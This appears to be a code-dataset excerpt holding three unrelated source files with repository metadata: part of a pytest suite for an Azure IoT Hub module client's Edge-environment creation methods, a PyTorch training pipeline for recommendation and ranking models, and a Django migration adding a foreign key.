x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] == mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == self.device_id
assert config.hostname == self.hostname
assert config.gateway_hostname is None
assert config.x509 is x509
assert config.blob_upload is False
assert config.method_invoke is False
@pytest.mark.it(
"Returns an instance of an IoTHubDeviceclient using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self, mocker, client_class, x509, mock_mqtt_pipeline_init, mock_http_pipeline_init
):
client = client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, module_id=self.module_id
)
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises a TypeError if the 'sastoken_ttl' kwarg is supplied by the user")
def test_sastoken_ttl(self, client_class, x509):
with pytest.raises(TypeError):
client_class.create_from_x509_certificate(
x509=x509, hostname=self.hostname, device_id=self.device_id, sastoken_ttl=1000
)
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientClientCreateFromEdgeEnvironmentUserOptionTests(
SharedIoTHubClientCreateMethodUserOptionTests
):
"""This class inherites the user option tests shared by all create method APIs, and overrides
tests in order to accomodate unique requirements for the .create_from_edge_enviornment() method.
Because .create_from_edge_environment() tests are spread accross multiple test units
(i.e. test classes), these overrides are done in this class, which is then inherited by all
.create_from_edge_environment() test units below.
"""
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_edge_environment
@pytest.fixture
def create_method_args(self):
"""Provides the specific create method args for use in universal tests"""
return []
@pytest.mark.it(
"Raises a TypeError if the 'server_verification_cert' user option parameter is provided"
)
def test_server_verification_cert_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
"""THIS TEST OVERRIDES AN INHERITED TEST"""
# Override to test that server_verification_cert CANNOT be provided in Edge scenarios
with pytest.raises(TypeError):
client_create_method(
*create_method_args, server_verification_cert="fake_server_verification_cert"
)
@pytest.mark.it("Sets default user options if none are provided")
def test_default_options(
self,
mocker,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
"""THIS TEST OVERRIDES AN INHERITED TEST"""
# Override so that can avoid the check on server_verification_cert being None
# as in Edge scenarios, it is not None
client_create_method(*create_method_args)
# Both pipelines use the same IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
# Pipeline Config has default options that were not specified
assert config.product_info == ""
assert config.websockets is False
assert config.cipher == ""
assert config.proxy_options is None
assert config.keep_alive == DEFAULT_KEEPALIVE
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests(
SharedIoTHubModuleClientClientCreateFromEdgeEnvironmentUserOptionTests
):
@pytest.fixture
def option_test_required_patching(self, mocker, mock_edge_hsm, edge_container_environment):
"""THIS FIXTURE OVERRIDES AN INHERITED FIXTURE"""
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
@pytest.mark.it(
"Creates a SasToken that uses an IoTEdgeHsm, from the values extracted from the Edge environment and the user-provided TTL"
)
def test_sastoken(self, mocker, client_class, mock_edge_hsm, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
)
custom_ttl = 1000
client_class.create_from_edge_environment(sastoken_ttl=custom_ttl)
# IoTEdgeHsm created using the extracted values
assert mock_edge_hsm.call_count == 1
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
# SasToken created with the IoTEdgeHsm, the expected URI and the custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, mock_edge_hsm.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(
self, mocker, client_class, mock_edge_hsm, edge_container_environment
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
)
client_class.create_from_edge_environment()
# IoTEdgeHsm created using the extracted values
assert mock_edge_hsm.call_count == 1
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
# SasToken created with the IoTEdgeHsm, the expected URI, and the default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, mock_edge_hsm.return_value, ttl=3600
)
@pytest.mark.it(
"Uses an IoTEdgeHsm as the SasToken signing mechanism even if any Edge local debug environment variables may also be present"
)
def test_hybrid_env(
self,
mocker,
client_class,
mock_edge_hsm,
edge_container_environment,
edge_local_debug_environment,
):
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
mock_sksm = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
client_class.create_from_edge_environment()
assert mock_sksm.call_count == 0 # we did NOT use SK signing mechanism
assert mock_edge_hsm.call_count == 1 # instead, we still used edge hsm
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
mocker.ANY, mock_edge_hsm.return_value, ttl=3600
)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the Edge environment"
)
def test_pipeline_config(
self,
mocker,
client_class,
mock_edge_hsm,
edge_container_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
client_class.create_from_edge_environment()
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == edge_container_environment["IOTEDGE_DEVICEID"]
assert config.module_id == edge_container_environment["IOTEDGE_MODULEID"]
assert config.hostname == edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"]
assert config.gateway_hostname == edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"]
assert config.sastoken is sastoken_mock.return_value
assert (
config.server_verification_cert
== mock_edge_hsm.return_value.get_certificate.return_value
)
assert config.method_invoke is True
assert config.blob_upload is False
@pytest.mark.it(
"Returns an instance of an IoTHubModuleClient using the created MQTT and HTTP pipelines"
)
def test_client_returns(
self,
mocker,
client_class,
mock_edge_hsm,
edge_container_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var",
[
"IOTEDGE_MODULEID",
"IOTEDGE_DEVICEID",
"IOTEDGE_IOTHUBHOSTNAME",
"IOTEDGE_GATEWAYHOSTNAME",
"IOTEDGE_APIVERSION",
"IOTEDGE_MODULEGENERATIONID",
"IOTEDGE_WORKLOADURI",
],
)
def test_bad_environment(
self, mocker, client_class, edge_container_environment, missing_env_var
):
# Remove a variable from the fixture
del edge_container_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises OSError if there is an error retrieving the server verification certificate from Edge with the IoTEdgeHsm"
)
def test_bad_edge_auth(self, mocker, client_class, edge_container_environment, mock_edge_hsm):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
my_edge_error = edge_hsm.IoTEdgeError()
mock_edge_hsm.return_value.get_certificate.side_effect = my_edge_error
with pytest.raises(OSError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_edge_error
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(
self, mocker, client_class, edge_container_environment, mock_edge_hsm
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is token_err
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests(
SharedIoTHubModuleClientClientCreateFromEdgeEnvironmentUserOptionTests
):
@pytest.fixture
def option_test_required_patching(self, mocker, mock_open, edge_local_debug_environment):
"""THIS FIXTURE OVERRIDES AN INHERITED FIXTURE"""
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
@pytest.fixture
def mock_open(self, mocker):
return mocker.patch.object(io, "open")
@pytest.mark.it(
"Creates a SasToken that uses a SymmetricKeySigningMechanism, from the values in the connection string extracted from the Edge local debug environment, as well as the user-provided TTL"
)
def test_sastoken(self, mocker, client_class, mock_open, edge_local_debug_environment):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(edge_local_debug_environment["EdgeHubConnectionString"])
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
custom_ttl = 1000
client_class.create_from_edge_environment(sastoken_ttl=custom_ttl)
# SymmetricKeySigningMechanism created using the connection string's Shared Access Key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# SasToken created with the SymmetricKeySigningMechanism, the expected URI, and the custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(self, mocker, client_class, mock_open, edge_local_debug_environment):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(edge_local_debug_environment["EdgeHubConnectionString"])
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
client_class.create_from_edge_environment()
# SymmetricKeySigningMechanism created using the connection string's Shared Access Key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# SasToken created with the SymmetricKeySigningMechanism, the expected URI and default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=3600
)
@pytest.mark.it(
"Only uses Edge local debug variables if no Edge container variables are present in the environment"
)
def test_auth_provider_and_pipeline_hybrid_env(
self,
mocker,
client_class,
edge_container_environment,
edge_local_debug_environment,
mock_open,
mock_edge_hsm,
):
# This test verifies that the presence of edge container environment variables means the
# code will follow the edge container environment creation path (using the IoTEdgeHsm)
# even if edge local debug variables are present.
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
client_class.create_from_edge_environment()
assert sksm_mock.call_count == 0 # we did NOT use SK signing mechanism
assert mock_edge_hsm.call_count == 1 # instead, we still used edge HSM
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
mocker.ANY, mock_edge_hsm.return_value, ttl=3600
)
@pytest.mark.it(
"Extracts the server verification certificate from the file indicated by the filepath extracted from the Edge local debug environment"
)
def test_open_ca_cert(self, mocker, client_class, edge_local_debug_environment, mock_open):
mock_file_handle = mock_open.return_value.__enter__.return_value
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
client_class.create_from_edge_environment()
assert mock_open.call_count == 1
assert mock_open.call_args == mocker.call(
edge_local_debug_environment["EdgeModuleCACertificateFile"], mode="r"
)
assert mock_file_handle.read.call_count == 1
assert mock_file_handle.read.call_args == mocker.call()
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the Edge local debug environment"
)
def test_pipeline_config(
self,
mocker,
client_class,
mock_open,
edge_local_debug_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
mock_file_handle = mock_open.return_value.__enter__.return_value
ca_cert_file_contents = "some cert"
mock_file_handle.read.return_value = ca_cert_file_contents
cs_obj = cs.ConnectionString(edge_local_debug_environment["EdgeHubConnectionString"])
client_class.create_from_edge_environment()
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelingConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == cs_obj[cs.DEVICE_ID]
assert config.module_id == cs_obj[cs.MODULE_ID]
assert config.hostname == cs_obj[cs.HOST_NAME]
assert config.gateway_hostname == cs_obj[cs.GATEWAY_HOST_NAME]
assert config.sastoken is sastoken_mock.return_value
assert config.server_verification_cert == ca_cert_file_contents
assert config.method_invoke is True
assert config.blob_upload is False
@pytest.mark.it(
"Returns an instance of an IoTHub client using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
mock_open,
edge_local_debug_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var", ["EdgeHubConnectionString", "EdgeModuleCACertificateFile"]
)
def test_bad_environment(
self, mocker, client_class, edge_local_debug_environment, missing_env_var, mock_open
):
# Remove a variable from the fixture
del edge_local_debug_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises ValueError if the connection string in the EdgeHubConnectionString environment variable is invalid"
)
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param(
"HostName=value.domain.net;DeviceId=my_device;ModuleId=my_module;SharedAccessKey=Invalid",
id="Shared Access Key invalid",
),
pytest.param(
"HostName=value.domain.net;WrongValue=Invalid;SharedAccessKey=Zm9vYmFy",
id="Contains extraneous data",
),
pytest.param("HostName=value.domain.net;DeviceId=my_device", id="Incomplete"),
],
)
def test_bad_connection_string(
self, mocker, client_class, edge_local_debug_environment, bad_cs, mock_open
):
edge_local_debug_environment["EdgeHubConnectionString"] = bad_cs
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
with pytest.raises(ValueError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises ValueError if the filepath in the EdgeModuleCACertificateFile environment variable is invalid"
)
def test_bad_filepath(self, mocker, client_class, edge_local_debug_environment, mock_open):
# To make tests compatible with Python 2 & 3, redfine errors
try:
FileNotFoundError # noqa: F823
except NameError:
FileNotFoundError = IOError
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
my_fnf_error = FileNotFoundError()
mock_open.side_effect = my_fnf_error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_fnf_error
@pytest.mark.it(
"Raises ValueError if the file referenced by the filepath in the EdgeModuleCACertificateFile environment variable cannot be opened"
)
def test_bad_file_io(self, mocker, client_class, edge_local_debug_environment, mock_open):
# Raise a different error in Python 2 vs 3
if six.PY2:
error = IOError()
else:
error = OSError()
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
mock_open.side_effect = error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is error
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is token_err
####################
# HELPER FUNCTIONS #
####################
def merge_dicts(d1, d2):
d3 = d1.copy()
d3.update(d2)
return d3
| 43.718088
| 193
| 0.710099
|
8ffbb2fa1497afc4bb951b792bf7223c9a8ccaa2
| 5,939
|
py
|
Python
|
training_pipelines.py
|
FreedomSlow/Recommendation-Systems
|
9799ce1ef8c5a5dc89fb2059c081065c87b4f294
|
[
"Apache-2.0"
] | null | null | null |
training_pipelines.py
|
FreedomSlow/Recommendation-Systems
|
9799ce1ef8c5a5dc89fb2059c081065c87b4f294
|
[
"Apache-2.0"
] | null | null | null |
training_pipelines.py
|
FreedomSlow/Recommendation-Systems
|
9799ce1ef8c5a5dc89fb2059c081065c87b4f294
|
[
"Apache-2.0"
] | null | null | null |
import torch
from tqdm import tqdm
import utils
from torch.utils.tensorboard import SummaryWriter
import loss_functions
import torchmetrics
def train_recommendation_model(net, train_iter, val_iter, epochs, learning_rate=1e-4, loss=None,
device=None, save_optim=None, scheduler=None, scheduler_conf=None,
use_tensorboard=False, feedback_type=None, **kwargs):
"""
Train simple recommendation model using user-item matrix to predict rating for all unseen items
:param net: Torch model
:param train_iter: Torch train DataLoader with X tensor of (user_id, item_id) and y tensor of their ratings
:param val_iter: Same as train_iter but for validation
:param epochs: Number of epochs
:param learning_rate: Learning rate
:param loss: Loss function
:param device: Device to train model on
:param save_optim: Either to save optimizer state
:param kwargs:
"""
if use_tensorboard is not None:
writer = SummaryWriter()
if device is None:
device = utils.try_gpu()
print(f"Training model on: {device}")
net.to(device)
# For NeuMF model with implicit feedback
if feedback_type == "implicit":
for item in val_iter:
val_iter = item
# Pytorch Embeddings work only with SGD (CPU/GPU), Adagrad (CPU)
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate)
if scheduler is not None:
if scheduler_conf is None:
_scheduler = scheduler(optimizer)
else:
_scheduler = scheduler(optimizer, **scheduler_conf)
if loss is None:
loss = torch.nn.MSELoss()
for epoch in range(epochs):
# Set gradients to train mode
net.train()
for i, (X, y) in enumerate(tqdm(train_iter)):
optimizer.zero_grad()
X, y = X.to(device), y.to(device)
user_tensor = utils.get_id_from_tensor(X, "user")
item_tensor = utils.get_id_from_tensor(X, "item")
y_pred = torch.flatten(net(user_tensor, item_tensor))
l = loss(y_pred, y)
l.backward()
optimizer.step()
with torch.no_grad():
X_test, y_test = val_iter
X_test, y_test = X_test.to(device), y_test.to(device)
_test_user_tensor = utils.get_id_from_tensor(X_test, "user")
_test_item_tensor = utils.get_id_from_tensor(X_test, "item")
y_test_pred = torch.flatten(net(_test_user_tensor, _test_item_tensor))
test_loss = loss(y_test_pred, y_test)
test_rmse = torchmetrics.functional.mean_squared_error(y_test_pred, y_test, squared=False)
# Add train and test loss to Tensorboard
if use_tensorboard is not None:
writer.add_scalar("train_loss", l, epoch)
writer.add_scalar("test_loss", test_loss, epoch)
writer.add_scalar("test_RMSE", test_rmse, epoch)
print(f"epoch: {epoch}", f"train loss: {l:.3f}", f"test loss: {test_loss} test RMSE: {test_rmse}")
if save_optim is not None:
torch.save(optimizer.state_dict(), save_optim)
return f"Optimizer saved to {save_optim}"
return
def train_ranking_model(net, train_iter, test_iter, epochs, learning_rate=1e-4, loss=None,
device=None, save_optim=None, hitrate_k=5, **kwargs):
"""
Train pairwise ranking model using user-item interactions positive examples
and using unobserved items as negative examples.
:param net:
:param train_iter:
:param test_iter:
:param epochs:
:param learning_rate:
:param loss:
:param device:
:param save_optim:
:param kwargs:
:return:
"""
writer = SummaryWriter()
device = utils.try_gpu() if device is None else device
print(f"Training model on: {device}")
net.to(device)
if loss is None:
if "margin" in kwargs:
_hinge_margin = kwargs["margin"]
else:
_hinge_margin = 1
loss = loss_functions.hinge_loss_rec
hitrate = torchmetrics.RetrievalHitRate(k=hitrate_k)
# Pytorch Embeddings work only with SGD (CPU/GPU), Adagrad (CPU)
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate, **kwargs)
for epoch in range(epochs):
# Set gradients to train mode
net.train()
# One observation (X matrix) in case of pairwise ranking consists of user_id, positive item_id
# And negative item_id
for i, batch in enumerate(tqdm(train_iter)):
optimizer.zero_grad()
user_id, pos_item, neg_item = batch
user_id = user_id.type(torch.IntTensor)
pos_item = pos_item.type(torch.IntTensor)
neg_item = neg_item.type(torch.IntTensor)
y_pred_pos = net(user_id, pos_item)
y_pred_neg = net(user_id, neg_item)
l = loss(y_pred_pos, y_pred_neg)
l.backward()
optimizer.step()
with torch.no_grad():
writer.add_scalar("train_loss", l, epoch)
hit_rate = 0
_cnt = 0
for test_batch in test_iter:
test_user_id, test_item_id, test_target = test_batch
test_user_id = test_user_id.type(torch.LongTensor)
test_item_id = test_item_id.type(torch.IntTensor)
test_target = test_target.type(torch.IntTensor)
test_pred = torch.flatten(net(test_user_id, test_item_id))
hit_rate += hitrate(test_pred, test_target, indexes=test_user_id)
_cnt += 1
hit_rate = hit_rate / _cnt
writer.add_scalar("test_HitRate", hit_rate, epoch)
print(f"epoch: {epoch}", f"train loss: {l:.3f}", f"test loss: {hit_rate:.3f}")
| 35.993939
| 111
| 0.618623
|
ebe647946eebe2329f093676e72fa6b7122b5f8f
| 644
|
py
|
Python
|
hrp/researches/migrations/0016_review_research.py
|
ken-mathenge/health_research_portal
|
e7e5ac8109c002a2d666c27ad076bbe040e00e5f
|
[
"MIT"
] | 1
|
2020-01-21T10:27:35.000Z
|
2020-01-21T10:27:35.000Z
|
hrp/researches/migrations/0016_review_research.py
|
ken-mathenge/health_research_portal
|
e7e5ac8109c002a2d666c27ad076bbe040e00e5f
|
[
"MIT"
] | 13
|
2020-03-23T09:25:15.000Z
|
2020-07-14T12:41:14.000Z
|
hrp/researches/migrations/0016_review_research.py
|
KennethMathenge/health_research_portal
|
e7e5ac8109c002a2d666c27ad076bbe040e00e5f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.3 on 2020-03-17 09:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("researches", "0015_review_reviewchecklist"),
]
operations = [
migrations.AddField(
model_name="review",
name="research",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.CASCADE,
related_name="research_to_review",
to="researches.Research",
),
preserve_default=False,
),
]
| 24.769231
| 60
| 0.57764
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.